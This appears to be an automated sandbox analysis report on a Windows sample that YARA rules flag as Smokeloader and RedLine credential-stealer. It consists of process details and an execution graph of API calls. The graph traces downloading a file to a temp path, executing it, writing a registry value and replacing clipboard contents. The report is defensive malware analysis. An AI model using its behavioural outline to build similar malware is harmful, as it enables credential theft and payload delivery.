                                                                                                  File size:330'240 bytes
                                                                                                  MD5 hash:E7A39D1C95A0D6EDCDA94874D38987C2
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000002.00000002.2277988619.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2277491965.0000000000512000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000002.00000002.2277951970.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2277491965.00000000004B5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 100%, Avira
                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                  • Detection: 53%, ReversingLabs
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  Target ID:5
                                                                                                  Start time:02:59:29
                                                                                                  Start date:05/01/2025
                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6556 -s 1884
                                                                                                  Imagebase:0xa0000
                                                                                                  File size:483'680 bytes
                                                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Reset < >

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:2.1%
                                                                                                    Dynamic/Decrypted Code Coverage:20.5%
                                                                                                    Signature Coverage:5.7%
                                                                                                    Total number of Nodes:760
                                                                                                    Total number of Limit Nodes:20
                                                                                                    execution_graph 64878 402c04 InternetOpenW 64879 402e55 64878->64879 64882 402c37 Hash 64878->64882 64899 40f8cf 64879->64899 64881 402e64 64890 42defd 64882->64890 64885 42defd std::_Locinfo::_Locinfo_ctor 26 API calls 64886 402e17 64885->64886 64887 42defd std::_Locinfo::_Locinfo_ctor 26 API calls 64886->64887 64888 402e29 InternetOpenUrlW 64887->64888 64888->64879 64889 402e44 InternetCloseHandle InternetCloseHandle 64888->64889 64889->64879 64891 42df1a 64890->64891 64893 42df0c 64890->64893 64906 42eac9 20 API calls _Atexit 64891->64906 64893->64891 64896 42df4a 64893->64896 64895 402e09 64895->64885 64896->64895 64908 42eac9 20 API calls _Atexit 64896->64908 64898 42df24 64907 42a59d 26 API calls _Deallocate 64898->64907 64900 40f8d8 64899->64900 64901 40f8da IsProcessorFeaturePresent 64899->64901 64900->64881 64903 40f94d 64901->64903 64909 40f911 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 64903->64909 64905 40fa30 64905->64881 64906->64898 64907->64895 64908->64898 64909->64905 64910 40fc06 64911 40fc12 BuildCatchObjectHelperInternal 64910->64911 64939 40fff3 64911->64939 64913 40fc19 64914 40fd6c 64913->64914 64917 40fc43 64913->64917 64960 4104d3 4 API calls 2 library calls 64914->64960 64916 40fd73 64961 42ffc9 28 API calls _Atexit 64916->64961 64926 40fc82 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 64917->64926 64954 42fcee 5 API calls __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 64917->64954 64919 40fd79 64962 42ff7b 28 API calls _Atexit 64919->64962 64922 40fc5c 64924 40fc62 64922->64924 64955 42fc92 5 API calls __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 64922->64955 64923 40fd81 64929 40fce3 64926->64929 64956 42a366 167 API calls 4 library calls 64926->64956 64950 4105ed 64929->64950 64930 40fce9 64931 40fcfe 64930->64931 64957 410623 GetModuleHandleW 64931->64957 64933 40fd05 64933->64916 64934 40fd09 64933->64934 64935 40fd12 64934->64935 64958 42ff6c 28 API calls _Atexit 64934->64958 64959 410182 13 API calls 2 library calls 64935->64959 64938 40fd1a 64938->64924 64940 40fffc 64939->64940 64963 41077b IsProcessorFeaturePresent 64940->64963 64942 410008 64964 428827 10 API calls 3 library calls 64942->64964 64944 410011 64944->64913 64945 41000d 64945->64944 64965 4317a1 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 64945->64965 64947 41001a 64948 410028 64947->64948 64966 428850 8 API calls 3 library calls 64947->64966 64948->64913 64967 426830 64950->64967 64953 410613 64953->64930 64954->64922 64955->64926 64956->64929 64957->64933 64958->64935 64959->64938 64960->64916 64961->64919 64962->64923 64963->64942 64964->64945 64965->64947 64966->64944 64968 410600 GetStartupInfoW 64967->64968 64968->64953 64969 432785 64974 432553 64969->64974 64972 4327ad 64975 43257e 64974->64975 64982 4326c7 64975->64982 64989 43c8ce 170 API calls 2 library calls 64975->64989 64977 432771 64993 42a59d 26 API calls _Deallocate 64977->64993 64979 4326d0 64979->64972 64986 43d01c 64979->64986 64981 432711 64981->64982 64990 43c8ce 170 API calls 2 library calls 64981->64990 64982->64979 64992 42eac9 20 API calls _Atexit 64982->64992 64984 432730 64984->64982 64991 43c8ce 170 API calls 2 library calls 64984->64991 64994 43c9f1 64986->64994 64988 43d037 64988->64972 64989->64981 64990->64984 64991->64982 64992->64977 64993->64979 64997 43c9fd BuildCatchObjectHelperInternal 64994->64997 64995 43ca0b 65012 42eac9 20 API calls _Atexit 64995->65012 64997->64995 64999 43ca44 64997->64999 64998 43ca10 65013 42a59d 26 API calls _Deallocate 64998->65013 65005 43cfcb 64999->65005 65004 43ca1a __wsopen_s 65004->64988 65015 43f941 65005->65015 65008 43ca68 65014 43ca91 LeaveCriticalSection __wsopen_s 65008->65014 65012->64998 65013->65004 65014->65004 65016 43f964 65015->65016 65017 43f94d 65015->65017 65018 43f983 65016->65018 65019 43f96c 65016->65019 65092 42eac9 20 API calls _Atexit 65017->65092 65096 434faa 10 API calls 2 library calls 65018->65096 65094 42eac9 20 API calls _Atexit 65019->65094 65021 43f952 65093 42a59d 26 API calls _Deallocate 65021->65093 65025 43f971 65095 42a59d 26 API calls _Deallocate 65025->65095 65026 43f98a MultiByteToWideChar 65028 43f9b9 65026->65028 65029 43f9a9 GetLastError 65026->65029 65098 4336a7 21 API calls 3 library calls 65028->65098 65097 42ea93 20 API calls 2 library calls 65029->65097 65032 43f9c1 65034 43f9e9 65032->65034 65035 43f9c8 MultiByteToWideChar 65032->65035 65033 43cfe1 65033->65008 65039 43d03c 65033->65039 65037 43346a _free 20 API calls 65034->65037 65035->65034 65036 43f9dd GetLastError 65035->65036 65099 42ea93 20 API calls 2 library calls 65036->65099 65037->65033 65100 43cd9f 65039->65100 65042 43d087 65118 43977e 65042->65118 65043 43d06e 65132 42eab6 20 API calls _Atexit 65043->65132 65046 43d08c 65047 43d095 65046->65047 65048 43d0ac 65046->65048 65134 42eab6 20 API calls _Atexit 65047->65134 65131 43cd0a CreateFileW 65048->65131 65052 43d09a 65135 42eac9 20 API calls _Atexit 65052->65135 65054 43d162 GetFileType 65058 43d1b4 65054->65058 65059 43d16d GetLastError 65054->65059 65055 43d073 65133 42eac9 20 API calls _Atexit 65055->65133 65056 43d0e5 65056->65054 65057 43d137 GetLastError 65056->65057 65136 43cd0a CreateFileW 65056->65136 65137 42ea93 20 API calls 2 library calls 65057->65137 65140 4396c7 21 API calls 3 library calls 65058->65140 65138 42ea93 20 API calls 2 library calls 65059->65138 65062 43d17b CloseHandle 65062->65055 65064 43d1a4 65062->65064 65139 42eac9 20 API calls _Atexit 65064->65139 65066 43d12a 65066->65054 65066->65057 65068 43d1d5 65070 43d221 65068->65070 65141 43cf1b 169 API calls 4 library calls 65068->65141 65069 43d1a9 65069->65055 65075 43d24e 65070->65075 65142 43cabd 167 API calls 4 library calls 65070->65142 65073 43d247 65074 43d25f 65073->65074 65073->65075 65077 43d009 65074->65077 65078 43d2dd CloseHandle 65074->65078 65143 4335cd 29 API calls 2 library calls 65075->65143 65086 43346a 65077->65086 65144 43cd0a CreateFileW 65078->65144 65080 43d308 65081 43d312 GetLastError 65080->65081 65082 43d257 65080->65082 65145 42ea93 20 API calls 2 library calls 65081->65145 65082->65077 65084 43d31e 65146 439890 21 API calls 3 library calls 65084->65146 65087 43349e __dosmaperr 65086->65087 65088 433475 HeapFree 65086->65088 65087->65008 65088->65087 65089 43348a 65088->65089 65169 42eac9 20 API calls _Atexit 65089->65169 65091 433490 GetLastError 65091->65087 65092->65021 65093->65033 65094->65025 65095->65033 65096->65026 65097->65033 65098->65032 65099->65034 65101 43cdc0 65100->65101 65102 43cdda 65100->65102 65101->65102 65154 42eac9 20 API calls _Atexit 65101->65154 65147 43cd2f 65102->65147 65104 43ce12 65108 43ce41 65104->65108 65156 42eac9 20 API calls _Atexit 65104->65156 65106 43cdcf 65155 42a59d 26 API calls _Deallocate 65106->65155 65115 43ce94 65108->65115 65158 42ffdf 26 API calls 2 library calls 65108->65158 65111 43ce8f 65113 43cf0e 65111->65113 65111->65115 65112 43ce36 65157 42a59d 26 API calls _Deallocate 65112->65157 65159 42a5ca 11 API calls _Atexit 65113->65159 65115->65042 65115->65043 65117 43cf1a 65119 43978a BuildCatchObjectHelperInternal 65118->65119 65162 42e3ed EnterCriticalSection 65119->65162 65121 4397d8 65163 439887 65121->65163 65123 4397b6 65166 43955d 21 API calls 3 library calls 65123->65166 65124 439791 65124->65121 65124->65123 65128 439824 EnterCriticalSection 65124->65128 65125 439801 __wsopen_s 65125->65046 65127 4397bb 65127->65121 65167 4396a4 EnterCriticalSection 65127->65167 65128->65121 65129 439831 LeaveCriticalSection 65128->65129 65129->65124 65131->65056 65132->65055 65133->65077 65134->65052 65135->65055 65136->65066 65137->65055 65138->65062 65139->65069 65140->65068 65141->65070 65142->65073 65143->65082 65144->65080 65145->65084 65146->65082 65148 43cd47 65147->65148 65149 43cd62 65148->65149 65160 42eac9 20 API calls _Atexit 65148->65160 65149->65104 65151 43cd86 65161 42a59d 26 API calls _Deallocate 65151->65161 65153 43cd91 65153->65104 65154->65106 65155->65102 65156->65112 65157->65108 65158->65111 65159->65117 65160->65151 65161->65153 65162->65124 65168 42e435 LeaveCriticalSection 65163->65168 65165 43988e 65165->65125 65166->65127 65167->65121 65168->65165 65169->65091 65170 43410a 65171 434116 BuildCatchObjectHelperInternal 65170->65171 65172 434122 65171->65172 65173 434139 65171->65173 65204 42eac9 20 API calls _Atexit 65172->65204 65183 42caff EnterCriticalSection 65173->65183 65176 434127 65205 42a59d 26 API calls _Deallocate 65176->65205 65177 434149 65184 434186 65177->65184 65180 434155 65206 43417c LeaveCriticalSection __fread_nolock 65180->65206 65182 434132 __wsopen_s 65183->65177 65185 434194 65184->65185 65186 4341ae 65184->65186 65217 42eac9 20 API calls _Atexit 65185->65217 65207 432908 65186->65207 65189 434199 65218 42a59d 26 API calls _Deallocate 65189->65218 65190 4341b7 65214 4347d3 65190->65214 65194 4342bb 65196 4342c8 65194->65196 65200 43426e 65194->65200 65195 43423f 65198 43425c 65195->65198 65195->65200 65220 42eac9 20 API calls _Atexit 65196->65220 65219 43449f 31 API calls 4 library calls 65198->65219 65201 4341a4 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 65200->65201 65221 43431b 30 API calls 2 library calls 65200->65221 65201->65180 65202 434266 65202->65201 65204->65176 65205->65182 65206->65182 65208 432914 65207->65208 65209 432929 65207->65209 65222 42eac9 20 API calls _Atexit 65208->65222 65209->65190 65211 432919 65223 42a59d 26 API calls _Deallocate 65211->65223 65213 432924 65213->65190 65224 434650 65214->65224 65216 4341d3 65216->65194 65216->65195 65216->65201 65217->65189 65218->65201 65219->65202 65220->65201 65221->65201 65222->65211 65223->65213 65225 43465c BuildCatchObjectHelperInternal 65224->65225 65226 434664 65225->65226 65227 43467c 65225->65227 65259 42eab6 20 API calls _Atexit 65226->65259 65229 434730 65227->65229 65234 4346b4 65227->65234 65264 42eab6 20 API calls _Atexit 65229->65264 65230 434669 65260 42eac9 20 API calls _Atexit 65230->65260 65233 434735 65265 42eac9 20 API calls _Atexit 65233->65265 65249 4396a4 EnterCriticalSection 65234->65249 65237 43473d 65266 42a59d 26 API calls _Deallocate 65237->65266 65238 4346ba 65240 4346f3 65238->65240 65241 4346de 65238->65241 65250 434755 65240->65250 65261 42eac9 20 API calls _Atexit 65241->65261 65242 434671 __wsopen_s 65242->65216 65245 4346ee 65263 434728 LeaveCriticalSection __wsopen_s 65245->65263 65246 4346e3 65262 42eab6 20 API calls _Atexit 65246->65262 65249->65238 65267 439921 65250->65267 65252 434767 65253 434780 SetFilePointerEx 65252->65253 65254 43476f 65252->65254 65256 434774 65253->65256 65257 434798 GetLastError 65253->65257 65280 42eac9 20 API calls _Atexit 65254->65280 65256->65245 65281 42ea93 20 API calls 2 library calls 65257->65281 65259->65230 65260->65242 65261->65246 65262->65245 65263->65242 65264->65233 65265->65237 65266->65242 65268 439943 65267->65268 65269 43992e 65267->65269 65274 439968 65268->65274 65284 42eab6 20 API calls _Atexit 65268->65284 65282 42eab6 20 API calls _Atexit 65269->65282 65271 439933 65283 42eac9 20 API calls _Atexit 65271->65283 65274->65252 65275 439973 65285 42eac9 20 API calls _Atexit 65275->65285 65277 43993b 65277->65252 65278 43997b 65286 42a59d 26 API calls _Deallocate 65278->65286 65280->65256 65281->65256 65282->65271 65283->65277 65284->65275 65285->65278 65286->65277 65287 20c0000 65290 20c0006 65287->65290 65291 20c0015 65290->65291 65294 20c07a6 65291->65294 65296 20c07c1 65294->65296 65295 20c07ca CreateToolhelp32Snapshot 65295->65296 65297 20c07e6 Module32First 65295->65297 65296->65295 65296->65297 65298 20c07f5 65297->65298 65300 20c0005 65297->65300 65301 20c0465 65298->65301 65302 20c0490 65301->65302 65303 20c04d9 65302->65303 65304 20c04a1 VirtualAlloc 65302->65304 65303->65303 65304->65303 65305 210003c 65306 2100049 65305->65306 65320 2100e0f SetErrorMode SetErrorMode 65306->65320 65311 2100265 65312 21002ce VirtualProtect 65311->65312 65314 210030b 65312->65314 65313 2100439 VirtualFree 65318 21005f4 LoadLibraryA 65313->65318 65319 21004be 65313->65319 65314->65313 65315 21004e3 LoadLibraryA 65315->65319 65317 21008c7 65318->65317 65319->65315 65319->65318 65321 2100223 65320->65321 65322 2100d90 65321->65322 65323 2100dad 65322->65323 65324 2100dbb GetPEB 65323->65324 65325 2100238 VirtualAlloc 65323->65325 65324->65325 65325->65311 65326 4332de 65327 4332eb 65326->65327 65331 433303 65326->65331 65376 42eac9 20 API calls _Atexit 65327->65376 65329 4332f0 65377 42a59d 26 API calls _Deallocate 65329->65377 65332 43335e 65331->65332 65340 4332fb 65331->65340 65378 434ccd 21 API calls 2 library calls 65331->65378 65334 432908 __fread_nolock 26 API calls 65332->65334 65335 433376 65334->65335 65346 432e16 65335->65346 65337 43337d 65338 432908 __fread_nolock 26 API calls 65337->65338 65337->65340 65339 4333a9 65338->65339 65339->65340 65341 432908 __fread_nolock 26 API calls 65339->65341 65342 4333b7 65341->65342 65342->65340 65343 432908 __fread_nolock 26 API calls 65342->65343 65344 4333c7 65343->65344 65345 432908 __fread_nolock 26 API calls 65344->65345 65345->65340 65347 432e22 BuildCatchObjectHelperInternal 65346->65347 65348 432e42 65347->65348 65349 432e2a 65347->65349 65350 432f08 65348->65350 65355 432e7b 65348->65355 65445 42eab6 20 API calls _Atexit 65349->65445 65452 42eab6 20 API calls _Atexit 65350->65452 65352 432e2f 65446 42eac9 20 API calls _Atexit 65352->65446 65357 432e8a 65355->65357 65358 432e9f 65355->65358 65356 432f0d 65453 42eac9 20 API calls _Atexit 65356->65453 65447 42eab6 20 API calls _Atexit 65357->65447 65379 4396a4 EnterCriticalSection 65358->65379 65362 432e97 65454 42a59d 26 API calls _Deallocate 65362->65454 65363 432e8f 65448 42eac9 20 API calls _Atexit 65363->65448 65364 432ea5 65368 432ec1 65364->65368 65369 432ed6 65364->65369 65366 432e37 __wsopen_s 65366->65337 65449 42eac9 20 API calls _Atexit 65368->65449 65380 432f29 65369->65380 65372 432ec6 65450 42eab6 20 API calls _Atexit 65372->65450 65373 432ed1 65451 432f00 LeaveCriticalSection __wsopen_s 65373->65451 65376->65329 65377->65340 65378->65332 65379->65364 65381 432f53 65380->65381 65382 432f3b 65380->65382 65384 4332bd 65381->65384 65389 432f98 65381->65389 65464 42eab6 20 API calls _Atexit 65382->65464 65482 42eab6 20 API calls _Atexit 65384->65482 65385 432f40 65465 42eac9 20 API calls _Atexit 65385->65465 65388 4332c2 65483 42eac9 20 API calls _Atexit 65388->65483 65390 432f48 65389->65390 65392 432fa3 65389->65392 65396 432fd3 65389->65396 65390->65373 65466 42eab6 20 API calls _Atexit 65392->65466 65393 432fb0 65484 42a59d 26 API calls _Deallocate 65393->65484 65395 432fa8 65467 42eac9 20 API calls _Atexit 65395->65467 65399 432fec 65396->65399 65400 433012 65396->65400 65401 43302e 65396->65401 65399->65400 65435 432ff9 65399->65435 65468 42eab6 20 API calls _Atexit 65400->65468 65471 4336a7 21 API calls 3 library calls 65401->65471 65404 433017 65469 42eac9 20 API calls _Atexit 65404->65469 65405 433045 65408 43346a _free 20 API calls 65405->65408 65411 43304e 65408->65411 65409 433197 65412 43320d 65409->65412 65416 4331b0 GetConsoleMode 65409->65416 65410 43301e 65470 42a59d 26 API calls _Deallocate 65410->65470 65414 43346a _free 20 API calls 65411->65414 65415 433211 ReadFile 65412->65415 65417 433055 65414->65417 65418 433285 GetLastError 65415->65418 65419 43322b 65415->65419 65416->65412 65420 4331c1 65416->65420 65421 43307a 65417->65421 65422 43305f 65417->65422 65423 433292 65418->65423 65424 4331e9 65418->65424 65419->65418 65425 433202 65419->65425 65420->65415 65426 4331c7 ReadConsoleW 65420->65426 65474 4347ee 65421->65474 65472 42eac9 20 API calls _Atexit 65422->65472 65480 42eac9 20 API calls _Atexit 65423->65480 65442 433029 __fread_nolock 65424->65442 65477 42ea93 20 API calls 2 library calls 65424->65477 65438 433250 65425->65438 65439 433267 65425->65439 65425->65442 65426->65425 65427 4331e3 GetLastError 65426->65427 65427->65424 65428 43346a _free 20 API calls 65428->65390 65433 433064 65473 42eab6 20 API calls _Atexit 65433->65473 65434 433297 65481 42eab6 20 API calls _Atexit 65434->65481 65455 43d365 65435->65455 65478 432c45 31 API calls 3 library calls 65438->65478 65441 43327e 65439->65441 65439->65442 65479 432a85 29 API calls __fread_nolock 65441->65479 65442->65428 65444 433283 65444->65442 65445->65352 65446->65366 65447->65363 65448->65362 65449->65372 65450->65373 65451->65366 65452->65356 65453->65362 65454->65366 65456 43d372 65455->65456 65457 43d37f 65455->65457 65485 42eac9 20 API calls _Atexit 65456->65485 65460 43d38b 65457->65460 65486 42eac9 20 API calls _Atexit 65457->65486 65459 43d377 65459->65409 65460->65409 65462 43d3ac 65487 42a59d 26 API calls _Deallocate 65462->65487 65464->65385 65465->65390 65466->65395 65467->65393 65468->65404 65469->65410 65470->65442 65471->65405 65472->65433 65473->65442 65475 434755 __fread_nolock 28 API calls 65474->65475 65476 434804 65475->65476 65476->65435 65477->65442 65478->65442 65479->65444 65480->65434 65481->65442 65482->65388 65483->65393 65484->65390 65485->65459 65486->65462 65487->65459 65488 402bad RegCreateKeyExW 65489 402bdb RegSetValueExW 65488->65489 65490 402bef 65488->65490 65489->65490 65491 402bf4 RegCloseKey 65490->65491 65492 402bfd 65490->65492 65491->65492 65493 404b8e 65494 404b9a Concurrency::details::_CancellationTokenState::_DeregisterCallback 65493->65494 65499 40fb0c 65494->65499 65498 404bba Concurrency::details::_CancellationTokenState::_DeregisterCallback Concurrency::details::SchedulerBase::Cleanup 65501 40fb11 65499->65501 65502 404ba3 65501->65502 65504 40fb2d Concurrency::details::SchedulerBase::AddContext 65501->65504 65523 42ad7e 65501->65523 65530 42f450 7 API calls 2 library calls 65501->65530 65507 4051d0 65502->65507 65531 42860d RaiseException 65504->65531 65506 4103cc 65508 4051dc Concurrency::details::_CancellationTokenState::_DeregisterCallback __Cnd_init 65507->65508 65510 4051f4 __Mtx_init 65508->65510 65542 40ce32 28 API calls std::_Throw_Cpp_error 65508->65542 65511 40521b 65510->65511 65543 40ce32 28 API calls std::_Throw_Cpp_error 65510->65543 65534 4010ea 65511->65534 65517 40526a 65518 40527f Concurrency::details::SchedulerBase::Cleanup 65517->65518 65545 401128 30 API calls 2 library calls 65517->65545 65546 401109 65518->65546 65522 4052a4 Concurrency::details::_CancellationTokenState::_DeregisterCallback 65522->65498 65528 4336a7 _Atexit 65523->65528 65524 4336e5 65533 42eac9 20 API calls _Atexit 65524->65533 65525 4336d0 RtlAllocateHeap 65527 4336e3 65525->65527 65525->65528 65527->65501 65528->65524 65528->65525 65532 42f450 7 API calls 2 library calls 65528->65532 65530->65501 65531->65506 65532->65528 65533->65527 65550 40d313 65534->65550 65537 401103 65539 40cef3 65537->65539 65574 42e114 65539->65574 65542->65510 65543->65511 65544 40ce32 28 API calls std::_Throw_Cpp_error 65544->65517 65545->65517 65547 401115 __Mtx_unlock 65546->65547 65548 401122 65547->65548 65899 40ce32 28 API calls std::_Throw_Cpp_error 65547->65899 65548->65522 65554 40d06d 65550->65554 65553 40ce32 28 API calls std::_Throw_Cpp_error 65553->65537 65555 40d0c3 65554->65555 65556 40d095 GetCurrentThreadId 65554->65556 65557 40d0c7 GetCurrentThreadId 65555->65557 65562 40d0ed 65555->65562 65558 40d0a0 GetCurrentThreadId 65556->65558 65569 40d0bb 65556->65569 65566 40d0d6 65557->65566 65558->65569 65559 40d186 GetCurrentThreadId 65559->65566 65560 40d1dd GetCurrentThreadId 65560->65569 65561 40f8cf __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 65565 4010f6 65561->65565 65562->65559 65563 40d10d 65562->65563 65572 40e92f GetSystemTimeAsFileTime __aulldvrm __Xtime_get_ticks 65563->65572 65565->65537 65565->65553 65566->65560 65566->65569 65568 40d145 GetCurrentThreadId 65568->65566 65570 40d118 __Xtime_diff_to_millis2 65568->65570 65569->65561 65570->65566 65570->65568 65570->65569 65573 40e92f GetSystemTimeAsFileTime __aulldvrm __Xtime_get_ticks 65570->65573 65572->65570 65573->65570 65575 42e121 65574->65575 65576 42e135 65574->65576 65597 42eac9 20 API calls _Atexit 65575->65597 65588 42e0cb 65576->65588 65579 42e126 65598 42a59d 26 API calls _Deallocate 65579->65598 65582 42e14a CreateThread 65584 42e175 65582->65584 65585 42e169 GetLastError 65582->65585 65619 42dfc0 65582->65619 65583 405257 65583->65517 65583->65544 65600 42e03d 65584->65600 65599 42ea93 20 API calls 2 library calls 65585->65599 65608 434d2a 65588->65608 65591 43346a _free 20 API calls 65592 42e0e4 65591->65592 65593 42e103 65592->65593 65594 42e0eb GetModuleHandleExW 65592->65594 65595 42e03d __Thrd_start 22 API calls 65593->65595 65594->65593 65596 42e10d 65595->65596 65596->65582 65596->65584 65597->65579 65598->65583 65599->65584 65601 42e04a 65600->65601 65602 42e06e 65600->65602 65603 42e050 CloseHandle 65601->65603 65604 42e059 65601->65604 65602->65583 65603->65604 65605 42e068 65604->65605 65606 42e05f FreeLibrary 65604->65606 65607 43346a _free 20 API calls 65605->65607 65606->65605 65607->65602 65609 434d37 65608->65609 65610 434d77 65609->65610 65611 434d62 HeapAlloc 65609->65611 65614 434d4b _Atexit 65609->65614 65618 42eac9 20 API calls _Atexit 65610->65618 65612 434d75 65611->65612 65611->65614 65615 42e0db 65612->65615 65614->65610 65614->65611 65617 42f450 7 API calls 2 library calls 65614->65617 65615->65591 65617->65614 65618->65615 65620 42dfcc _Atexit 65619->65620 65621 42dfd3 GetLastError ExitThread 65620->65621 65622 42dfe0 65620->65622 65635 431eda GetLastError 65622->65635 65624 42dfe5 65655 435571 65624->65655 65627 42dffb 65662 401169 65627->65662 65636 431ef0 65635->65636 65637 431ef6 65635->65637 65670 435111 11 API calls 2 library calls 65636->65670 65639 434d2a _Atexit 20 API calls 65637->65639 65641 431f45 SetLastError 65637->65641 65640 431f08 65639->65640 65642 431f10 65640->65642 65671 435167 11 API calls 2 library calls 65640->65671 65641->65624 65644 43346a _free 20 API calls 65642->65644 65646 431f16 65644->65646 65645 431f25 65645->65642 65647 431f2c 65645->65647 65649 431f51 SetLastError 65646->65649 65672 431d4c 20 API calls _Atexit 65647->65672 65673 42df7d 167 API calls 2 library calls 65649->65673 65650 431f37 65652 43346a _free 20 API calls 65650->65652 65654 431f3e 65652->65654 65653 431f5d 65654->65641 65654->65649 65656 435596 65655->65656 65657 43558c 65655->65657 65674 434e93 5 API calls 2 library calls 65656->65674 65659 40f8cf __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 65657->65659 65660 42dff0 65659->65660 65660->65627 65669 4354a4 10 API calls 2 library calls 65660->65669 65661 4355ad 65661->65657 65675 40155a Sleep 65662->65675 65677 405800 65662->65677 65663 401173 65666 42e199 65663->65666 65867 42e074 65666->65867 65668 42e1a6 65669->65627 65670->65637 65671->65645 65672->65650 65673->65653 65674->65661 65676 4016d5 65675->65676 65678 40580c Concurrency::details::_CancellationTokenState::_DeregisterCallback 65677->65678 65679 4010ea std::_Cnd_initX 35 API calls 65678->65679 65680 405821 __Cnd_signal 65679->65680 65681 405839 65680->65681 65734 40ce32 28 API calls std::_Throw_Cpp_error 65680->65734 65683 401109 std::_Cnd_initX 28 API calls 65681->65683 65684 405842 65683->65684 65690 4029f4 InternetOpenW 65684->65690 65706 4016df 65684->65706 65687 405849 Concurrency::details::_CancellationTokenState::_DeregisterCallback Concurrency::details::SchedulerBase::Cleanup 65687->65663 65691 402a27 InternetOpenUrlW 65690->65691 65692 402b9c 65690->65692 65691->65692 65693 402a3d GetTempPathW GetTempFileNameW 65691->65693 65695 40f8cf __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 65692->65695 65735 42a88e 65693->65735 65697 402bab 65695->65697 65727 40e76b 65697->65727 65698 402b8b InternetCloseHandle InternetCloseHandle 65698->65692 65699 402aa8 Hash 65700 402ac0 InternetReadFile WriteFile 65699->65700 65701 402b00 CloseHandle 65699->65701 65700->65699 65737 402960 65701->65737 65704 402b2b ShellExecuteExW 65704->65698 65705 402b72 WaitForSingleObject CloseHandle 65704->65705 65705->65698 65845 40fde6 65706->65845 65708 4016eb Sleep 65846 40cc10 65708->65846 65711 40cc10 28 API calls 65712 401711 65711->65712 65713 40171b OpenClipboard 65712->65713 65714 401943 Sleep 65713->65714 65715 40172b GetClipboardData 65713->65715 65714->65713 65716 40173b GlobalLock 65715->65716 65717 40193d CloseClipboard 65715->65717 65716->65717 65718 401748 _strlen 65716->65718 65717->65714 65718->65717 65719 40cbc7 28 API calls std::system_error::system_error 65718->65719 65720 40cc10 28 API calls 65718->65720 65722 4018d2 EmptyClipboard GlobalAlloc 65718->65722 65850 402e66 167 API calls 2 library calls 65718->65850 65852 40caa6 26 API calls _Deallocate 65718->65852 65719->65718 65720->65718 65722->65718 65723 4018eb GlobalLock 65722->65723 65851 426990 65723->65851 65726 401905 GlobalUnlock SetClipboardData GlobalFree 65726->65718 65858 40deea 65727->65858 65731 40e782 __Cnd_do_broadcast_at_thread_exit __Mtx_unlock __Cnd_broadcast 65865 40def6 LeaveCriticalSection std::_Lockit::~_Lockit 65731->65865 65733 40e810 65733->65687 65734->65681 65736 402a76 CreateFileW 65735->65736 65736->65698 65736->65699 65738 40298b _wcslen Hash 65737->65738 65747 42b454 65738->65747 65742 4029b8 65769 404333 65742->65769 65745 40f8cf __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 65746 4029f2 65745->65746 65746->65698 65746->65704 65773 42b106 65747->65773 65750 402823 65751 402832 Concurrency::details::_CancellationTokenState::_DeregisterCallback 65750->65751 65799 4032dd 65751->65799 65753 402846 65815 403b8b 65753->65815 65755 40285a 65756 402888 65755->65756 65757 40286c 65755->65757 65821 403112 65756->65821 65842 40329a 167 API calls 65757->65842 65760 402895 65824 403c20 65760->65824 65762 4028a7 65834 403cc2 65762->65834 65763 40287f std::ios_base::_Ios_base_dtor Concurrency::details::_CancellationTokenState::_DeregisterCallback 65763->65742 65765 4028c4 65766 404333 26 API calls 65765->65766 65767 4028e3 65766->65767 65843 40329a 167 API calls 65767->65843 65770 4029e4 65769->65770 65771 40433b 65769->65771 65770->65745 65844 40cc96 26 API calls 2 library calls 65771->65844 65774 42b133 65773->65774 65775 42b142 65774->65775 65776 42b15a 65774->65776 65788 42b137 65774->65788 65777 42eac9 __Wcscoll 20 API calls 65775->65777 65778 42a747 __fassign 162 API calls 65776->65778 65780 42b147 65777->65780 65781 42b165 65778->65781 65779 40f8cf __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 65782 4029a4 65779->65782 65783 42a59d _Atexit 26 API calls 65780->65783 65784 42b170 65781->65784 65785 42b307 65781->65785 65782->65750 65783->65788 65787 42b218 WideCharToMultiByte 65784->65787 65791 42b17b 65784->65791 65796 42b1b5 WideCharToMultiByte 65784->65796 65786 42b334 WideCharToMultiByte 65785->65786 65789 42b312 65785->65789 65786->65789 65787->65791 65792 42b243 65787->65792 65788->65779 65789->65788 65793 42eac9 __Wcscoll 20 API calls 65789->65793 65791->65788 65795 